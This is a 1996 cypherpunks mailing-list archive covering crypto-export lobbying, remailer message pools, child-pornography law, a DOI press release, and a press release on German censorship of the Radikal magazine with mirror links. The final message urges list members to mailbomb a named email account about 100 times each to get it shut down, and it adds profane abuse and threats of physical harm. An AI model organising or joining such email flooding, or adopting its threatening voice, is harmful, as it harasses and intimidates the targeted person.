From jimbell at pacifier.com Wed Sep 11 18:12:28 1996
From: jimbell at pacifier.com (jim bell)
Date: Thu, 12 Sep 1996 09:12:28 +0800
Subject: ALERT: Call the Commerce committee! 1-800-962-3524
Message-ID: <199609111741.KAA18899@mail.pacifier.com>

Checking my files and verifying the number this morning, I find that
there is an active 1-800 number to call Congress. (Don't know whose it
is, but it reaches the Congressional switchboard...)

The Capitol Switchboard can be reached at 1-800-962-3524.

At 12:42 AM 9/11/96 -0400, Voters Telecommunications Watch wrote:
>========================================================================
>
>          SENATE COMMERCE COMMITTEE VOTE TOMORROW IN QUESTION
>            WHITE HOUSE STALLING; THE NET CAN SAVE THE VOTE
>
>                 OFFICES ARE RECEIVING 'LOTS OF CALLS'
>                 MAKE A CALL TO THE COMMERCE COMMITTEE
>
>                          September 11, 1996
>
>      Please widely redistribute this document with this banner intact
>                        until September 30, 1996
>
>________________________________________________________________________
>CONTENTS
>        The Latest News
>        What You Can Do Now
>        Background / What To Expect This Week
>        Description of S.1726, Pro-CODE Bill
>        Chronology of Pro-Crypto Legislation
>        For More Information / Supporting Organizations
>
>________________________________________________________________________
>THE LATEST NEWS
>
>Sometimes things work out better than imagined. This was the feeling
>tonight as I waded through my email from people all over the country that
>called the commerce committee. This was the feeling as I heard from visitors
>to one Senator's office who, while waiting for a few minutes in the lobby,
>listened to the receptionist take two quick calls from netizens calling
>about the bill.
>
>Receptionist, cutting the caller off: "S.1726? Yes, I'll pass that along
>to the Senator, thanks. We've been getting a lot of calls."
>
>Another netizen emailed us saying that he also called his Representative.
>It turns out this Rep. has some friends who have co-sponsored HR 3011, the
>House version of Pro-CODE. The calls and elevated publicity from this phone
>campaign have convinced him to consider co-sponsoring HR 3011.
>
>This is great, but our success has mobilized the anti-crypto forces
>into action as well. The Clinton Administration, who has long opposed
>the right of citizens to use non-Clipper encryption, has begun working
>behind the scenes to make sure that the vote on Pro-CODE (S.1726) never
>happens.
>
>To have the Senate Commerce committee go on record that encryption exports
>should be loosened, against the will of the Administration, would be
>an embarrassment to the White House. They have begun pushing hard to
>pressure Democratic Commerce Committee members to put the brakes on the
>bill, and do everything they can to prevent the vote this Thursday.
>
>To see the business community, the industry, and the public line up the
>Administration would be extremely hard to take and still seem
>credible.
>
>It's crucial that we continue to make noise and ring those phones. By
>pulling enough favors with members of the Senate Commerce Committee, it's
>possible that the White House could prevent this vote from happening.
>
>WE MUST NOT LET THAT HAPPEN. Appropriately forward this to everyone you
>know until the expiration listed above. Go to work, bug your neighbor
>in the cubicle or office next to you. Have they called yet? Bug them
>until they do. Call the rest of the members you haven't gotten around to
>yet.
>
>And don't forget to sign the petition at http://www.crypto.com/petition/ !
>
>[Rest of alert is the same from last time]
>________________________________________________________________________
>WHAT YOU CAN DO NOW
>
>It's crucial that you call the Commerce committee members below and
>urge them to pass S.1726 out of committee without amendments. (This is
>also known as a "clean" bill.) Any opportunity for amendments (even if
>they are good) opens us up to the possibility of hostile amendments
>that could restrict the use of encryption even further than today's
>abysmal state. It could even prohibit the use of encryption without
>Clipper Chip-like key 'escrow' technology, which includes built-in
>surveillance and monitoring functionality.
>
>1. Call/Fax the members of the Senate Commerce committee and urge
>   them to pass S.1726 out of committee "cleanly". Do not use email,
>   as it is not likely to be looked at in time to make a difference
>   for the markup on September 12th.
>
>   Use the sample communique and directory listing below to make it a
>   simple TWO MINUTE task.
>
>2. Sign the petition to support strong encryption at
>   http://www.crypto.com/petition/ ! Join other cyber-heroes as
>   Phil Zimmermann, Matt Blaze, Bruce Schneier, Vince Cate, Phil Karn, and
>   others who have also signed.
>
>3. Between now and Wed. September 12, it is crucial that you call all
>   these members of Congress.
>
>   P ST Name and Address           Phone           Fax
>   = == ========================   ==============  ==============
>   D SC Hollings, Ernest F.        1-202-224-6121  1-202-224-4293
>   D MA Kerry, John F.             1-202-224-2742  1-202-224-8525
>   D HI Inouye, Daniel K.          1-202-224-3934  1-202-224-6747
>   D KY Ford, Wendell H.           1-202-224-4343  1-202-224-0046
>   D WV Rockefeller, John D.       1-202-224-6472  1-202-224-7665
>   D LA Breaux, John B.            1-202-224-4623  1-202-228-2577
>   D NV Bryan, Richard H.          1-202-224-6244  1-202-224-1867
>   D ND Dorgan, Byron L.           1-202-224-2551  1-202-224-1193
>   D NE Exon, J. J.                1-202-224-4224  1-202-224-5213
>   D OR Wyden, Ron*                1-202-224-5244  1-202-228-2717
>
>   R SD Pressler, Larry*           1-202-224-5842  1-202-224-1259
>   R MT Burns, Conrad R.(*sponsor) 1-202-224-2644  1-202-224-8594
>   R AK Stevens, Ted               1-202-224-3004  1-202-224-2354
>   R AZ McCain, John               1-202-224-2235  1-202-228-2862
>   R WA Gorton, Slade              1-202-224-3441  1-202-224-9393
>   R MS Lott, Trent*               1-202-224-6253  1-202-224-2262
>   R TX Hutchison, Kay Bailey      1-202-224-5922  1-202-224-0776
>   R ME Snowe, Olympia             1-202-224-5344  1-202-224-1946
>   R MO Ashcroft, John*            1-202-224-6154  1-202-228-0998
>   R TN Frist, Bill                1-202-224-3344  1-202-228-1264
>   R MI Abraham, Spencer           1-202-224-4822  1-202-224-8834
>
>   * supporter or cosponsor. The bill also enjoys broad bi-partisan
>   support from members not on the committee including Senators Leahy
>   (D-VT) and Murray (D-WA).
>
>4. Here is a sample conversation:
>
>       SAMPLE PHONE CALL
>       You:
>       Sen:Hello, Senator Mojo's office!
>
>       You:
>
>SAY    I'm calling to urge the Senator to pass S.1726, the
>THIS-> Burns/Leahy/Pressler bill, S.1726 when the committee votes on
>       it on Thursday. It's critical to the future of privacy, security,
>       and electronic commerce on the internet.
>
>       Sen:Ok, thanks!
>
>       IF THEY SAY
>         "The Senator has concerns about the bill",
>       please answer,
>         "Please try to work these issues out as it moves to the Senate floor,
>         but passage out of committee will send an important signal to
>         the Administration."
>
>5. To help us measure the effectiveness of the campaign, WE NEED TO HEAR FROM
>   YOU. Please tell us who you called, and how they sounded. We'll be
>   passing this information to folks in D.C. who can help apply pressure
>   where needed.
>
>       $ Mail vtw at vtw.org
>       Subject: I called so-and-so
>
>       Hey, I called Sen. Mojo. He sounded iffy, call in the
>       reinforcements.
>       ^D
>
>6. Forward this to your friends and colleagues in appropriate forums
>   until the date of expiration at the top. Forward a copy of this to
>   your Internet Service Provider as well, and ask them to put the following
>   text in their message of the day (motd), or on their WWW page:
>
>   ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
>
>   The U.S. Senate will be voting on a proposal to encourage
>   better security on the Internet on Thu Sep. 12th. Your help is
>   needed to call Congress. See http://www.crypto.com/ for more
>   details.
>
>   ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT ALERT
>
>________________________________________________________________________
>BACKGROUND / WHAT TO EXPECT THIS WEEK
>
>For the past 3 years, Cyber-Rights Activists, citizens, and industry
>leaders have been working hard to reform US encryption policy.
>
>Support has been building behind several legislative proposals this
>year because they send a clear signal to the Administration about the
>need for security and privacy in the Information Age. The digital
>revolution is currently being held hostage by the White House's Cold
>War restrictions on privacy-enhancing encryption technology.
>
>Now, with Congress less than a month away from adjournment, everyone
>who supports encryption and privacy is working to see this bill leave
>committee in order to send a clear message to the White House that they
>are on the wrong side of the encryption issue. Although this bill may
>not become law this year, its passage out of committee will be a
>landmark event that will clearly tell the White House that the
>Congress, the public, and the computer industry care about security and
>privacy, and need strong, reliable encryption technology in order to
>make the Internet a viable platform for commerce, education, and
>democracy.
>
>Success for our side is not certain, and the next week is not without risks.
>On September 12th, the Senate Commerce committee will hold a "markup",
>where the bill is examined, voted on, and if there are enough votes,
>passed out of committee.
Two things could happen: > > -the committee could pass the bill as written, > -the committee could pass the bill with amendments. > >Any amendments are not likely to be friendly, and in particular, quiet >sources have told privacy activists that the Clinton Administration has been >readying a legislative assault on your right to use encryption for several >weeks now. A Clipper-like amendment could be attached to the bill if >our side does not have enough votes to block all amendments. > >It is crucial that all netizens who consider privacy and security important >take a moment to call members of the Commerce Committee right now and >urge them to vote S.1726 out of committee without amendments. > >________________________________________________________________________ >DESCRIPTION OF S.1726, PRO-CODE BILL > >Privacy-enhancing encryption technology is currently under heavy restrictions >kept in place by the White House. Encryption that is currently allowed to >be exported is not sufficient to protect confidential information. This >policy acquires an "Alice-in-Wonderland" quality when one realizes that >strong encryption products are available abroad both for sale and for free >download off the Internet. > >The Pro-CODE Act resolves to: > >1. Allow for the *unrestricted* export of "mass-market" or "public-domain" > encryption programs, including such products as Pretty Good Privacy and > popular World Wide Web browsers. > >2. Requires the Secretary of Commerce to allow the less restricted export > of other encryption technologies if products of similar strength are > generally available outside the United States, roughly up to DES > strength. > >3. Prohibits the federal government from imposing mandatory key-escrow > encryption policies on the domestic market and limiting the authority > of the Secretary of Commerce to set standards for encryption products. 
> >________________________________________________________________________ >CHRONOLOGY OF PRO-CRYPTO LEGISLATION > >9/12/96 (scheduled) >Senate Commerce committee will hold markup of S.1726 and hopefully pass it >out of committee with no amendments. > >7/25/96: Full Senate Commerce committee holds positive hearings on S.1726. >FBI Director Louis Freeh testifies along with many cyber-luminaries. >Hearings are cybercast Internet Cyber-Rights activists with HotWired >and WWW.Crypto.Com. You can see the photos, read the testimony, and >listen to the audio transcript at http://www.crypto.com/events/072596/ > >6/26/96: Senate subcommittee holds positive hearings on S.1726. Hearings are >cybercast Internet Cyber-Rights activists with HotWired and WWW.Crypto.Com. >You can see the photos, read the testimony, and listen to the audio >transcript at http://www.crypto.com/events/062696/ > >5/2/96: Bi-partisan group of Senators introduce Pro-CODE Act, which would >free public-domain encryption software (such as PGP) for export, free much >commercial encryption for export, and reduce the government's ability to >push Clipper proposals down the throats of an unwilling public. Original >sponsors include: Senators Burns (R-MT), Dole (R-KS), Faircloth (R-NC), >Leahy (D-VT), Murray (D-WA), Pressler (R-SD), and Wyden (D-OR). > >3/5/96: Sen. Leahy (D-VT) and Rep. Goodlatte (R-VA) announce encryption bills >(S.1587/H.R.3011) that significantly relax export restrictions on products >with encryption functionality in them, as well as free public domain software >such as PGP (Pretty Good Privacy). > >________________________________________________________________________ >FOR MORE INFORMATION / SUPPORTING ORGANIZATIONS > >There are many excellent resources online to get up to speed on crypto >including the following WWW sites: > >http://www.crypto.com http://www.privacy.org http://www.eff.org >http://www.cdt.org http://www.epic.org http://www.vtw.org > >Please visit them often. 
> >The following organizations have signed onto this alert: > > Center for Democracy and Technology > Electronic Frontier Foundation > Electronic Privacy Information Center > Voters Telecommunications Watch > >________________________________________________________________________ >End alert >======================================================================== > > Jim Bell jimbell at pacifier.com From tcmay at got.net Wed Sep 11 18:23:29 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 12 Sep 1996 09:23:29 +0800 Subject: One Time Reply Blocks (was Re: strengthening remailer protocols) Message-ID: At 4:56 PM 9/11/96, Bill Frantz wrote: >Let me float one more hair-brained idea. I think Tim May is right in >saying that the most secure response technique is the one in Blacknet. >i.e. The response are posted to some public bulletin board, and then Alice >reads them at her leisure. > >I see two problems with this approach: (1) It doesn't scale well, and (2) >Alice's reading of the response may be detected. (I think of the vans in >Great Britain which listen to the local oscillator frequency of TV sets to >find what people are watching.) I agree that message pools have interesting scaling problems. If most messages are in the same large pool, and lots of people are using pools, then that pool could become very, very large. However, we are many _years_ away from this situation, and a very large number of _text_ messages (as opposed to JPEGs) can be put in a few dozen megabytes of pool space. I contend that many "scaling problems" turn out to be relatively unimportant, for various reasons. (And scaling problems should not be a reason not to deploy a simple system...odds are that other factors will enter long before the system breaks. The Xanadu people may have worried too much about hypertext database scaling problems, while the more straightforward HTML/URL hypertext scheme actually got deployed and changed the playing field completely.) 
There are also likely to be various kinds of pools, thus partly solving the scaling problem by hierarchies. (This could worsen the traffic analysis--who is reading what--problem, though.) On the traffic analysis problem, I also think this is overrated as a risk. The likelihood that the TLAs could figure out which of the messages in "alt.anonymous.messages" I am actually interested in is small. And there are PageSat-type distribution systems, @Home-type cable distribution systems, etc. (My DSS satellite has provisions for a digital feed...it is reported to be coming soon.) Reply-blocks are a _clear_ problem, while message pools have various basic advantages. I would worry more about scaling when volume is 1000 times what it now is. (And digital postage solves a lot of scaling problems.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From maldrich at grci.com Wed Sep 11 18:31:03 1996 From: maldrich at grci.com (Mark O. Aldrich) Date: Thu, 12 Sep 1996 09:31:03 +0800 Subject: Hacking Mobil Telephone System ? In-Reply-To: Message-ID: On Wed, 11 Sep 1996, Jüri Kaljundi wrote: > Actually 65.000$ is pronounced sixty five thousand dollars not sixty five > dollars, at least in Eastern and Central Europe. > Ok, Juri - you win the award of having been the FIRST of the 875,00 (actually, 27 - count 'em, 27) people who sent me mail to say that in Europe they use a comma, not a period, for their decimal point. Sorry to all of the rest of you who entered the contest, but you don't win squat. 
Juri, you don't win squat either, but you do get this nifty little proclamation that you were the very first. After having traveled in Europe, I was certainly familiar with the difference in the notation. You'd also think, however, that I would have paid more attention to what the hell I was reading before I shot off my mouth (via my keyboard), but I didn't. I think this is called a "brain fart" (note to our European brothers and sisters - over there, I think you call it a "mental fugue" or "Parliamentary election," I'm not sure which). This concludes our contest of the day. I would like to thank EACH and EVERY one of you who contributed an entry. No further submissions will be accepted. Void where prohibited. BTW, $65,000.00 USD (translate per local convention as necessary) is *STILL* not enough to a) go up against the German police, and b) fund a penetration attack that would bring about the opportunity to play with really cool toys. After all, screw the profit or charity, right? When it's all said and done, IT'S THE TOYS THAT REALLY MATTER. ------------------------------------------------------------------------- |And if Dole wins and dies in office, they| Mark Aldrich | |could just pickle him and no one would | GRCI INFOSEC Engineering | |notice. It wouldn't be the first time we| maldrich at grci.com | |had a dill-dole running the country. | MAldrich at dockmaster.ncsc.mil| | -- Alan Olsen | | |_______________________________________________________________________| |The author is PGP Empowered. Public key at: finger maldrich at grci.com | | The opinions expressed herein are strictly those of the author | | and my employer gets no credit for them whatsoever. 
| ------------------------------------------------------------------------- From smith at sctc.com Wed Sep 11 18:31:24 1996 From: smith at sctc.com (Rick Smith) Date: Thu, 12 Sep 1996 09:31:24 +0800 Subject: Child Porn as Thoughtcrime Message-ID: <199609112256.RAA09825@shade.sctc.com> Tim wrote: : Declan answers in the affirmative that, yes, nearly all of the examples I : cited are indeed crimes. .... : As I well knew, which is why I presented them. (The Jock Sturges case was : in SF, ... I've read in several places that the Jock Sturges case was thrown out of court by the judge. Nobody has dragged me away in shackles for owning "Radiant Images." Stores selling photo books often carry his work, and it is rarely covered with opaque plastic. So it may be nudity that set the gendarmes (sp?) in motion, but that's evidently not what's really illegal. I wonder what would happen if an "adult magazine" were to reproduce Sturges' work. The court case might be interesting... Now apply that to the Web. Imagine there's a Sturges site, and a porn site links to it. Does that make the Sturges material "child porn?" If so, is the porn site illegal or the Sturges site? I suspect the prosecutors will come down on both and let the courts sort it out. Prior restraint, eh? : ...the "little girls in leotards" case was only a few years ago, etc.) Don't know about that one. Is it illegal for little girls to be photographed in leotards now? "Nutcracker" is X rated? Move over, Bambi. Personally, I think the political posturing theory captures the essence of the legislative climate. Rick. From live at excite.com Wed Sep 11 18:33:17 1996 From: live at excite.com (live at excite.com) Date: Thu, 12 Sep 1996 09:33:17 +0800 Subject: Your Excite Live! page Message-ID: <199609112256.PAA19540@jiff.> A request was made for the location of your Excite Live! 
page Found your Excite Live at URL http://live.excite.com/?uid=CEC8C99632372D6E From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 11 18:48:37 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 12 Sep 1996 09:48:37 +0800 Subject: RRE: Digital Objects Identifiers Message-ID: <01I9CWTXLIZC9ULNWE@mbcl.rutgers.edu> From: IN%"rre at weber.ucsd.edu" 10-SEP-1996 23:06:58.45 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Date: Mon, 9 Sep 1996 15:59:26 -0400 (EDT) From: Paul Evan Peters To: Multiple recipients of list Subject: Digital Objects Identifiers Dear CNI-Announce subscribers: I thought that you would like to have the attached brought to your attention, especial so since: o it deals with a critical technical issue in the evolution of the networked information environment, and o involves the Association of American Publishers (AAP) and the Corporation for National Research Initiatives (CNRI), two organizations with which CNI collaborates from time to time, as well as o Reed Elsevier, Inc., the parent corporation of Elsevier Science B.V., a member of the CNI Task Force. Best, Paul Paul Evan Peters paul at cni.org Executive Director fax 202-872-0884 Coalition for Networked Information 202-296-5098 21 Dupont Circle ftp://ftp.cni.org/ Washington, DC 20036 gopher://gopher.cni.org:70/ USA http://www.cni.org/CNI.homepage.html CONTACT: Judith Platt: 202-232-3335, ext. 229 jplatt at publishers.org Washington, D.C. 
September 9, 1996 TEAM SELECTED TO DEVELOP DIGITAL OBJECT IDENTIFIER SYSTEM FOR PUBLISHING INDUSTRY The Association of American Publishers (AAP) today announced selection of the team that will develop a Digital Object Identifier (DOI) system for use by the publishing industry. The team, comprising R.R. Bowker, a division of Reed Elsevier, Inc., and the Corporation for National Research Initiatives (CNRI), was chosen following a competitive bidding process initiated last spring as part of AAP's all-out effort to promote development of systems for managing copyright in the digital environment. Copyright management is seen as the key to successful commercial use of the Internet by the publishing industry. The DOI project is the outgrowth of a year-long AAP initiative to identify the needs of the publishing industry to facilitate safe and successful commercial ventures on the Internet and in other networked environments. AAP's initial research revealed a fundamental need for a unique, unambiguous way to identify digital materials-- a type of "electronic license plate" for a "digital vehicle" traveling the information superhighway. The Digital Object Identifier system will serve that purpose. The Bowker/CNRI team will focus on three key areas during the first year: developing a numbering system for identifying digital objects created by publishers; creating an agency for assigning publisher numbers; and developing a network-based directory to link digital objects to their publisher. DOIs will be made accessible via a high-speed computer system developed by CNRI--a scalable, distributed system on the Internet, with open interfaces, allowing information about digital material to be retrieved almost instantaneously. R.R. Bowker will establish the agency for making publisher numbers and other related information available to any and all publishers. 
Since the DOI system uses open standards, publishers and other companies can build their own products and services based around DOIs. AAP President Nicholas Veliotes said that "In selecting the team to develop a DOI system, AAP is taking a major step forward in the search for viable, effective copyright management in the electronic environment. Our members see this as a top priority as the publishing industry positions itself for the new Century." Robert Badger (Springer Verlag NY), a member of AAP's Enabling Technologies Committee and head of its DOI task force, pointed out: "For people to buy and sell information on the Internet, the publishing community needs two things which this announcement sets in motion. First, we need a simple way to identify which piece of information is being purchased; that's what the number does. Second, we need an easy way for the reader to get current information about the digital object--and this system will accomplish that by directing the reader's question immediately to the right place in the publishing organization. It's more than just a Universal Product Code for information; it's a market-making mechanism." Robert Kahn, President of CNRI and a recognized pioneer in the development of the Internet, said "We are delighted that our technology was selected for this important application. It will provide a key component of the global information infrastructure and can serve as a model for information access across many sectors of the economy." R.R. Bowker's Publisher Peter Simon noted that "As the organization that runs the ISBN Agency in the United States, and the publisher of key tools for locating published materials (including the preeminent Books in Print database), we are very pleased to be contributing our experience and expertise to creating new standards for digital materials and facilitating commerce on the Internet for the publishing industry." 
The Association of American Publishers is the principal trade association of the U.S. book publishing industry. Its members publish hardcover and paperback books in every field, including general fiction and non-fiction, poetry, children's books, textbooks, Bibles, reference works, scientific, medical, technical, professional, and scholarly books and journals, and a range of educational materials for the elementary, secondary, postsecondary and professional markets. AAP members also produce computer software and electronic products and services, including online databases and CD-ROM. Among AAP's primary concerns is the protection of intellectual property rights at home and abroad, in all media. R.R. Bowker, a division of Reed Elsevier, Inc., is one of the foremost U.S. bibliographic publishers, providing reference information to libraries, booksellers, and publishers since 1872. Its Books in Print database is currently available in hard copy, CD-ROM, tape & site license, and online. In addition, Bowker is the independent agent in the U.S. for the International ISBN and SAN systems. The ISBN is an identification system for books and other media which allows for order processing by booksellers, libraries, universities, wholesalers and distributors. DOI project contact at Bowker is Maureen Adamson, Vice President, Business Development--(908) 665-2856; madamson at reedref.com. The Corporation for National Research Initiatives is an internationally recognized leader in information technology research and development, with particular strength in networking, large-scale information systems, and digital object infrastructure. A non-profit organization formed in 1986 to foster research and development for a national information infrastructure, CNRI has, since its inception, been actively engaged in the establishment of open, non-proprietary technological approaches for networked systems. 
DOI project contact at CNRI is Constance McLindon, Director, System Deployment--(703) 620-8990; mclindon at cnri.reston.va.us. From tank at xs4all.nl Wed Sep 11 18:56:05 1996 From: tank at xs4all.nl (tank) Date: Thu, 12 Sep 1996 09:56:05 +0800 Subject: Pressrelease SPG: About the digital Radikal Message-ID: <199609112206.AAA17575@xs2.xs4all.nl> Pressrelease Solidariteitsgroep Politieke Gevangenen (SPG)- (Solidaritygroup Political Prisoners) Amsterdam, September 9th , 1996. German Prosecution starts investigation into the digital Radikal. On monday the 2nd of september the BRD State Prosecution started an official investigation against 'unknown distributors' of the Radikal-magazine on the Internet. These 'unknown distributors' are suspected of violating the German law: Par. 129a Abs. 3 StGB : Recruiting for an illegal terrorist organisation, Par. 140 Nr. 2 StGB : Approval of criminal offences, Par. 130a Abs. 1 StGB : Calling for criminal acts. The digital version of the Radikal is accessible through computers in the Netherlands and the United States. Besides this legal investigation, the German BAW (prosecution office) has ordered German Internet Providers to block the access to the digital version of the Radikal. A number of providers and associations of providers has given in to this call. This means that all websites of XS4ALL-clients in the Netherlands and of DataRealm-clients in the USA. have been made inaccessible for German Internet users. In reaction to this German attempt to censor the Internet mirrorsites (identical copies) of the Radikal have been put on various computers throughout the world. Since December 1995 we, the Solidaritygroup Political Prisoners, have added the full edition of the in Germany illegal magazine Radikal to our homepage on the World Wide Web. On this moment major parts of number 153 and the full edition of number 154 are accessible through the World Wide Web. 
We decided to do this after a renewed attempt (one of many over the years) of the German authorities to silence the Radikal. The Radikal is a magazine made by and for the radical left movement in the BRD. The magazine was set up in the mid-'70s as a means of communication between various left-wing organisations. After a series of home searches, arrests and long-time prison sentences, it was clear for the makers that they couldn't continue the magazine on the same basis. It was decided then to make the future editions of the magazine outside the view of the German authorities. Because the German Prosecution couldn't localise the makers of Radikal, a short period of quietness followed in which no police raids etc. took place. Then trouble started anew. This time it was not the makers of the magazine who were targeted, but the persons who sold the magazine, bookshops and infocafes. Through the years there have been hundreds of police raids, numerous arrests and many people have spent months and years in jail for 'supporting a terrorist organisation' (i.e. distribution of the Radikal). As a result of these experiences the distribution of the Radikal is no longer organised through bookshops etc., but through an underground network. Mid June 1995 the German Prosecution struck again. All over Germany special units of the police stormed, often with drawn guns, a great number of houses and left-wing centres. Four people were arrested and charged with membership of a terrorist organisation (i.e. making and distributing the Radikal). Four others, who were not at home at the time of the police raid, went underground. An enormous amount of things were confiscated by the police. It was striking that the police especially looked for digital information. More than a thousand floppy discs and various computers were taken for further research. The people arrested were held in detention under remand for six months and were only released after payment of 20.000 DM bail p.p. 
and a whole set of conditions they had to comply with. Exactly one year after the raids on June 13 1996, three of the four persons in hiding (Uli, Jutta and Frank) turned themselves in. Supported by 250 sympathisers they reported themselves at a German court after a press conference. (Matthes, the fourth person in hiding, stayed away, because he is also being charged with membership of the AIZ, the Anti Imperialist Cells.) At the court the three persons were taken into detention under remand after which their lawyer filed a petition for immediate release on grounds of the fact that there was no reason that the suspects would again run away and that after one year there's no longer any risk that the suspects would destroy any evidence. The petition was only partially successful. On June 15 Uli and Jutta were released, again with a lot of conditions. They had to hand in their passports, had to report themselves three times a week at the police, were not allowed any contact with anybody against whom an investigation was going on with regard to the Radikal and they had to pay a bail of 20.000 DM each. Frank is until now held in isolation under aggravated circumstances. The Prosecution claims to have proof that he collaborated on the release of Radikal editions 153 & 154 during his period in hiding. Up till now his lawyers were not allowed to look into his dossier. New actions against the Radikal took place on June 17 this year when in a number of German cities again houses were searched by the police. This time persons suspected of having a subscription to the Radikal were targeted. By way of their payments they were accused of supporting a terrorist organisation. Besides this they were suspected of letting others read the Radikal (recruiting for a terrorist organisation). For us this was another reason to put the latest issue (154) of the Radikal again on the Internet. 
Despite the fact that we, the Solidaritygroup Political Prisoners (SPG) Amsterdam, declared before that we put the Radikal on Internet, the German Prosecution started an investigation against 'unknown persons'. This is a frequently used strategy. With an investigation on name, the Prosecution can only get permission to tap the phones etc. of a limited amount of people, while an investigation against 'persons unknown' gives them much more possibilities. With this in mind it wouldn't surprise us if one of these days in Germany the police will again kick in a lot of doors in relation with the investigation against us. The German Prosecution seems to be pretty confident at the moment and states that from the confiscated goods, they managed to compile a lot of information about the Radikal, her makers (m/f) and her structures. But we wonder if they are going to be equally confident about their actions against the digital Radikal. Censorship on the Internet creates best-sellers. With respect to the Internet this is a very important case. For the first time a European government tries to censor political news on the Internet. (Until now such action was only directed against porn on the Internet.) If the German Prosecution succeeds in their attempts to censor the Internet, the Radikal will be the first but definitely not the last. Fortunately there are many people active around the theme of censorship on the Internet and though they don't all support us ideologically, many declare themselves to sympathise with the struggle for the continuation of the Radikal on the Internet and accordingly place copies of the magazine on their Websites. On this moment the Radikal is already accessible through more than twenty addresses over the whole world. If the German Prosecution wants to sustain their attempts to block the digital Radikal they will have to block all these providers and will finally block Germany from the rest of the Internet. Read the Radikal now at: 1. 
http://burn.ucsd.edu/%7Eats/RADIKAL/ 2. http://www.jca.or.jp/~taratta/mirror/radikal/ 3. http://www.serve.com/~spg/ 4. http://huizen.dds.nl/~radikal 5. http://www.canucksoup.net/radikal/index.html 6. http://www.ecn.org/radikal 7. http://www.well.com/~declan/mirrors/ 8. http://www.connix.com/~harry/radikal/index.htm 9. http://www.ganesa.com/radikal/ 10. http://www.denhaag.org/~radikal 11. http://www.knooppunt.be/~daniel/radikal 12. http://emma.unm.edu/radikal 13. http://www.tacacs.com/radikal/" 14. http://www.dsvenlo.nl/vvd/radikal/ 15. http://www.why.net/home/static/radi 16. http://users.abcs.com/dockmstr/mirror/radikal/index.htm 17. http://www.xs4all.nl/~jeroenw/radikal/ 18. http://home.ipr.nl/~radikal/ 19. http://www.dreamy.demon.co.uk/occam/ 20. http://www.ibmpcug.co.uk/~irdial/live_free/ 21.http://zero.tolerance.org/radi/index.htm 22.http://www.meaning.com/library/radikal/ 23.http://www.xs4all.nl/~irmed/radikal/ 24.http://www.walli.uwasa.fi/~tviemero/radikal 25.http://www.sko.it/~sfede/radi/index.htm 26.http://www.bart.nl/~sz/index.html 27.http://bellp.med.yale.edu/index.htm 28.http://www.euronet.nl/users/funest/radi/index.htm And naturally as usual at: http://www.xs4all.nl/~tank/radikal/ >From here we want to wish Frank in prison and Matthes where ever he is lots of strength. The struggle continues !! Please write to Frank (he will probably be replaced to Koln soon). His temporary address is : Frank Grossinsky p/a Ermittlungsrichter Wolst am BGH Herrenstr.45a 76125 Karlsruhe Germany. (All post will be read and censored by the police!) 11-9-1996 Solidariteitsgroep Politieke Gevangenen, (SPG Amsterdam). 
tank at xs4all.nl http://www.xs4all.nl/~tank From paul at fatmans.demon.co.uk Wed Sep 11 19:04:05 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 12 Sep 1996 10:04:05 +0800 Subject: talker Message-ID: <842469316.4436.0@fatmans.demon.co.uk> CC'd to cypherpunks mailing list: I received this this afternoon (11/9/96), this has gone far enough, would anyone here care to join me in mailbombing this guy? just reply this mail to him at doom13 at juno.com about 100 times or so, if we get about 100 people to do this it should generate enough traffic to close his account down. my reply to his mail is at the bottom: > Listen up you son of a bitch! Don't fucker call me a piece of horse shit > you cocksucker or I'll mailbomb your ass so many times you won't even > think of replying. You don't know shit about my hacking mother fucker. > Fuck you and go suck on some media crypto pussy shit. Listen you spotty socially unskilled adolescent masturbator: Your petty and pathetic claims amuse me, I laugh at your worthless and dirty existence peon. What have you ever hacked, have you broken any encryption codes, have you found security weaknesses by new and ingenious methods, have you practised within the hacker ethic? I think not. You are a *WANNABEE*, a punk who knows not the slightest thing about systems security, can't code, and couldn't hack his way out of a wet paper bag, your mailbombing threats are about as technical as you can get. In addition your flames show no linguistic creativity, just a bunch of crude words thrown together, get an education you trailer butt-fucker. Mailbomb me, go ahead punk, make my day, if you dare to even think about doing so I will kick your ass, I will hurt you in ways you cannot imagine, I have carried out vindictive personal vendettas before and will do so again if necessary. Go on, I dare you, I double dare you motherfucker. 
